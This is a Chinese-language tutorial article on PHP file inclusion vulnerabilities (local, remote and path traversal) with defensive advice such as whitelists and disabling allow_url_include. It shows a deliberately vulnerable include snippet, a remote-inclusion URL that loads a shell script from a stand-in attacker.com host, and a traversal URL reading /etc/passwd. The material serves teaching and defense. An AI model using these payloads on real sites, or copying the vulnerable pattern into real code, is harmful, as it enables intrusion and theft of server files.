php有哪些文件包含漏洞

舞夢輝影
发布: 2025-12-05 19:20:59
原创
735人浏览过
PHP文件包含漏洞主要因未过滤用户输入导致,分为本地文件包含(LFI)、远程文件包含(RFI)和目录遍历三类,攻击者可借此读取敏感文件或执行恶意代码;防范措施包括使用白名单、关闭allow_url_include、严格过滤输入、避免直接拼接路径等,核心原则是不信任用户输入。

php有哪些文件包含漏洞

PHP 文件包含漏洞主要源于开发者在代码中动态引入文件时,未对用户输入进行严格过滤,导致攻击者可以包含恶意文件或敏感系统文件。这类漏洞分为以下几种类型:

1. 本地文件包含(LFI - Local File Inclusion)

说明:当 PHP 脚本使用 includerequireinclude_oncerequire_once 包含本地服务器上的文件,而文件路径由用户控制时,可能被利用读取服务器上的任意文件。

常见利用方式:

  • 读取敏感配置文件,如 /etc/passwdconfig.php
  • 配合文件上传漏洞执行任意代码
  • 通过日志文件写入 PHP 代码,再包含执行(如访问日志、错误日志)

示例代码(存在漏洞):

立即学习PHP免费学习笔记(深入)”;

$filename = $_GET['file'];
include($filename . '.php');

2. 远程文件包含(RFI - Remote File Inclusion)

说明:当 PHP 配置允许远程文件包含(allow_url_include=On),且程序动态包含外部 URL 时,攻击者可指定恶意远程脚本地址,导致任意代码执行。

前提条件:

ChatDOC
ChatDOC

ChatDOC是一款基于chatgpt的文件阅读助手,可以快速从pdf中提取、定位和总结信息

ChatDOC 262
查看详情 ChatDOC
  • allow_url_include = On(默认关闭)
  • 输入未过滤,直接用于包含语句

示例利用:

http://example.com/index.php?file=http://attacker.com/shell.txt

若目标服务器允许远程包含,就会加载并执行攻击者服务器上的脚本。

3. 目录遍历(Path Traversal)与 LFI 结合

说明:攻击者使用 ../ 绕过目录限制,访问上级目录中的敏感文件。

示例:

http://example.com/page.php?page=../../../../etc/passwd

若未做路径校验,可能导致系统文件泄露。

如何防范文件包含漏洞?

  • 避免将用户输入直接用于文件包含路径
  • 使用白名单机制限定可包含的文件名
  • 关闭危险配置:设置 allow_url_include=Offallow_url_fopen=Off(如非必要)
  • 对输入进行严格过滤和验证,如去除特殊字符、限制路径格式
  • 使用固定映射代替直接文件名拼接,例如:
    $pages = ['home' => 'home.php', 'about' => 'about.php'];
    根据输入选择对应值,而非直接拼接

基本上就这些。关键在于不信任用户输入,尤其是用在文件操作中的参数。

以上就是php有哪些文件包含漏洞的详细内容,更多请关注php中文网其它相关文章!

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号